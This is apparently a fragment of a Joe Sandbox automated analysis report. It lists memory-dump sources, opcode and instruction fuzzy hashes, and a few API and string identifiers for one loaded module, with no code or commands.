                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: cbe9bbfa621d77dea57e6b0165406112bd8e5c6d214bf51f5da938bd5b7aeac0
                                                                                                                                                                                                          • Instruction ID: 911d05cc4452374e52f106c378e0daa966ca19637b54e92e04a3f2266af6e3f8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbe9bbfa621d77dea57e6b0165406112bd8e5c6d214bf51f5da938bd5b7aeac0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24B1E462B1A74345E7698B249831BB936A2AF54B88F14C232D95D462FDDF3DF8818F00
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2b8bac832d0c650086b4dc42c53d8ace14853648eeee84f5419066bf6c47015c
                                                                                                                                                                                                          • Instruction ID: 29942c70a606543af3a220c8c6c68e1f425f7a76adbae8a59878a6b821558beb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b8bac832d0c650086b4dc42c53d8ace14853648eeee84f5419066bf6c47015c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F591502270D5D10EDB0D8F7DD8A017D3EF1AA8EA19319406EE6DBEA657D43EC682C700
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b28eec96b4380ef9a2f21c612e464b736ee0e67a7e4dedad1db971d69b90961c
                                                                                                                                                                                                          • Instruction ID: 58e291871871683b6061c25f611ffda30312721ae3263956e3e42f5d6a9a7b68
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b28eec96b4380ef9a2f21c612e464b736ee0e67a7e4dedad1db971d69b90961c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1A18E72B1A74686EB20CF26E054AA9B7A4FB44788F558035CBAD47BB9DF3CE451C700
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 071c24b70f5cbd7195dd42993fdc9672807ef3d9a88019fc5a960ffd462a855e
                                                                                                                                                                                                          • Instruction ID: bbed6995ae79b41b816721d95bc15a999ea9476f6fb5d875f8b2d74dde2a8809
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 071c24b70f5cbd7195dd42993fdc9672807ef3d9a88019fc5a960ffd462a855e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42916EB7B246408FE318CFB5D451ADD37B2F788748B419129DF06A7B08DB34AA16CB80
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: c6a89dc18ea4a9d0869e7230d4763db27abee8d8773c002f4b02af570902890e
                                                                                                                                                                                                          • Instruction ID: 2964b99f036c631b5bb5f093590daf22a33783c06ad708d0fbb090db76aac389
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6a89dc18ea4a9d0869e7230d4763db27abee8d8773c002f4b02af570902890e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6581D432B0AB834AE7149F22E424A797790FF84B85F189031DA6A47BF9DF7CE5018700
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 18083e57824a17161829f0eedd83e2d6a19884e712728e89765a44399dddd317
                                                                                                                                                                                                          • Instruction ID: 8dab186b0c31e3ab6a105d52cc3c7ea18f6c95e5cf69923c26c4d51b2db34b69
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18083e57824a17161829f0eedd83e2d6a19884e712728e89765a44399dddd317
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2991B066F19B86C2E704CF29851067C77A1FB98B88F199235DF5D437AADF38E6818300
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: aa821b9dd0a51dc4c0b2dec16ace554500e5714ebed2369b8a61626328a49fd8
                                                                                                                                                                                                          • Instruction ID: 195d26cfc5cd361cab5f5dbbaac667b8088d0e336d94ae27e85b3113ba50d871
                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa821b9dd0a51dc4c0b2dec16ace554500e5714ebed2369b8a61626328a49fd8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7771D2B2B16B5A86EB288B46A860E7977A1FB84BC5F408035DE9D477B8CF3CD541C700
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 16ceb259e3493bf1ec588c8a0c623d746afe974d10b1d82e5808d70a243b2649
                                                                                                                                                                                                          • Instruction ID: 649d083262fb99c0832849004858a04873e51faed3e56c96c2263e64811545d0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16ceb259e3493bf1ec588c8a0c623d746afe974d10b1d82e5808d70a243b2649
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C51171371E3CA8AEB50CB5D841076C7AE1E765B48F5D8135EA98833F6CA3DD906C311
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 43cee2cadc116fe26df870a37d5be353b2a15b4d1b3a6f279a79b3fcc68079dc
                                                                                                                                                                                                          • Instruction ID: b24153375da36cd0fbf5e64d6a40da4e2de7d367a7dcbcbd36823247ec4ca84e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43cee2cadc116fe26df870a37d5be353b2a15b4d1b3a6f279a79b3fcc68079dc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D921F3C670B6D44EDF02C7A988627B47F91D76778CF58E066D58806FEAC51DD00AD310
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 570795689-0
                                                                                                                                                                                                          • Opcode ID: aeb96a2494a04752b5dc3f15f4d6223bcbf2d088cd50240a63637ce0e1d52570
                                                                                                                                                                                                          • Instruction ID: 6f9cd269f0a1651ebff4d7345a6447f4f73d58bceaf5aad9fb8b969389faa703
                                                                                                                                                                                                          • Opcode Fuzzy Hash: aeb96a2494a04752b5dc3f15f4d6223bcbf2d088cd50240a63637ce0e1d52570
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E411878B2A24741FB5867617975D791282DFC57A8F344635EA3E0B6FEDE3CE801A200
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: new[]
                                                                                                                                                                                                          • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                          • API String ID: 4059295235-3840279414
                                                                                                                                                                                                          • Opcode ID: bb63b660b28564e2b4f56d70e8d4805a2ad26e5cdeba8f4d134ad6f1fd5ea73c
                                                                                                                                                                                                          • Instruction ID: b402623a5bde1c2d0273b7773e4db376dbf143d6bbd7da429d15fa479883cb88
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb63b660b28564e2b4f56d70e8d4805a2ad26e5cdeba8f4d134ad6f1fd5ea73c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1451E411B2E78745FB199B22A471E766792EFC4B84F484432DA6D476FACE3CE8858304
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                          • Opcode ID: b279a170408d618237bddf6b9ec99c878b24dd9d163caff4e822d6b1485b2f82
                                                                                                                                                                                                          • Instruction ID: c1b2d5dde26c7daeb497266801de3a685505c0e260bf51ed9208bc5ef40d80f5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b279a170408d618237bddf6b9ec99c878b24dd9d163caff4e822d6b1485b2f82
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E61160A2F3EA0301F754136AF966B751940EFD53B8F280A35E67E066FE9E1C68407201